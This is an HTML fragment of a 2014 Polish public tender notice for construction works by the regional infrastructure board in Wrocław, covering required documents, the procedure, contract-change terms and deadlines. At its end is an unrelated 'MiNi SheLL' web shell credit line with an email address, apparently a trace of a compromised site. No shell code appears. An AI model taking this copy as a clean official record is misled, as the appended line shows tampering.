<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. informacje ogólne o Wykonawcy - Formularz Nr 1;
2. oświadczenie o spełnieniu warunków udziału w postępowaniu (oryginał podpisany przez Wykonawcę) - Formularz Nr 2;
3. propozycje ewentualnego podzlecenia elementów robót - (oryginał podpisany przez Wykonawcę) - Formularz nr 5 oraz 5a; 
4. tabela elementów scalonych (oryginał podpisany przez Wykonawcę) 
- Formularz nr 6;
1.2.1	oświadczenie o braku podstaw do wykluczenia (oryginał podpisany przez Wykonawcę) - Formularz Nr 2a;
1.2.2	informację o przynależności do grupy kapitałowej (oryginał podpisany przez Wykonawcę) - Formularz nr 9</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie: 

1.	Terminu wykonania przedmiotu umowy w przypadku:
a)	wystąpienia okoliczności uniemożliwiających realizację robót w terminie umownym. Za okoliczności takie uważa się wstrzymanie robót przez Zamawiającego lub kierownika budowy w sytuacjach wskazanych w ustawie prawo budowlane, a także wystąpienia okoliczności niezależnych od Wykonawcy, w tym wynikających z tzw. siły wyższej (np. powodzie, huragany, gwałtowne burze) uniemożliwiających realizację robót. Wstrzymanie robót z tego powodu musi być potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru. Wstrzymanie robót budowlanych ze względu na warunki atmosferyczne typowe (właściwe) dla danej pory roku 
i miesiąca, lub zła organizacja robót nie uzasadniają zmiany terminu umowy,
b)	stwierdzenia, że w dokumentacji projektowej przekazanej przez Zamawiającego zgodnie z § 1 ust. 2 umowy, znajdują się błędy uniemożliwiające prawidłowe 
i terminowe wykonanie przedmiotu umowy,
c)	wprowadzenia rozwiązań zamiennych  na zasadach określonych w § 2 umowy, których wprowadzenie miało wpływ na termin realizacji zamówienia,
d)	zawarcia umowy na zamówienie dodatkowe, którego realizacja wpływa na realizację zamówienia podstawowego,
e)	wydłużenia procedury przetargowej (spowodowanej m. in. przedłużeniem przez Zamawiającego terminu związania ofertą, wpłynięcia odwołania),
f)	ujawnienia się w trakcie realizacji przedmiotu zamówienia przeszkód w obiekcie 
lub terenie/gruncie,
g)	ujawnienia się w trakcie realizacji przedmiotu umowy nieprzewidzianych przeszkód formalno-prawnych,

2.	Wynagrodzenia Wykonawcy w przypadku zmiany powszechnie obowiązujących przepisów prawa w szczególności przepisów prawa podatkowego;

3.	Wprowadzenia rozwiązań zamiennych o których mowa w § 2 umowy.

4.	Zmiany kierownika budowy lub kierowników robót, pod warunkiem, że nowa osoba będzie spełniać wymagania  określone w SIWZ dla danej funkcji.

5.	Zmiany zakresu robót realizowanych przez podwykonawcę, wskazanych 
w Formularzu nr ..., lub powierzenia części zamówienia podwykonawcy mimo braku takiego wskazania w Formularzu nr ..., z przyczyn obiektywnie uzasadnionych. 

6.	Wszelkie zmiany do niniejszej umowy (poza zamianami wskazanymi w pkt 4 i 5) wymagają pod rygorem nieważności zachowania formy pisemnej poprzez spisanie aneksu do umowy.

7.	Wykonawca zobowiązuje się do informowania Zamawiającego o zmianie formy 
prowadzonej działalności oraz zmianie adresu siedziby firmy i zamieszkania jej
właściciela, pod rygorem uznania korespondencji kierowanej na ostatni podany przez Wykonawcę adres za doręczony. Powyższe zobowiązanie dotyczy okresu obowiązywania umowy, rękojmi gwarancji oraz nie zakończonych rozliczeń wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rziwroclaw.wp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław - pok. 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2014 godzina 10:00, miejsce: Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław - pok. 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com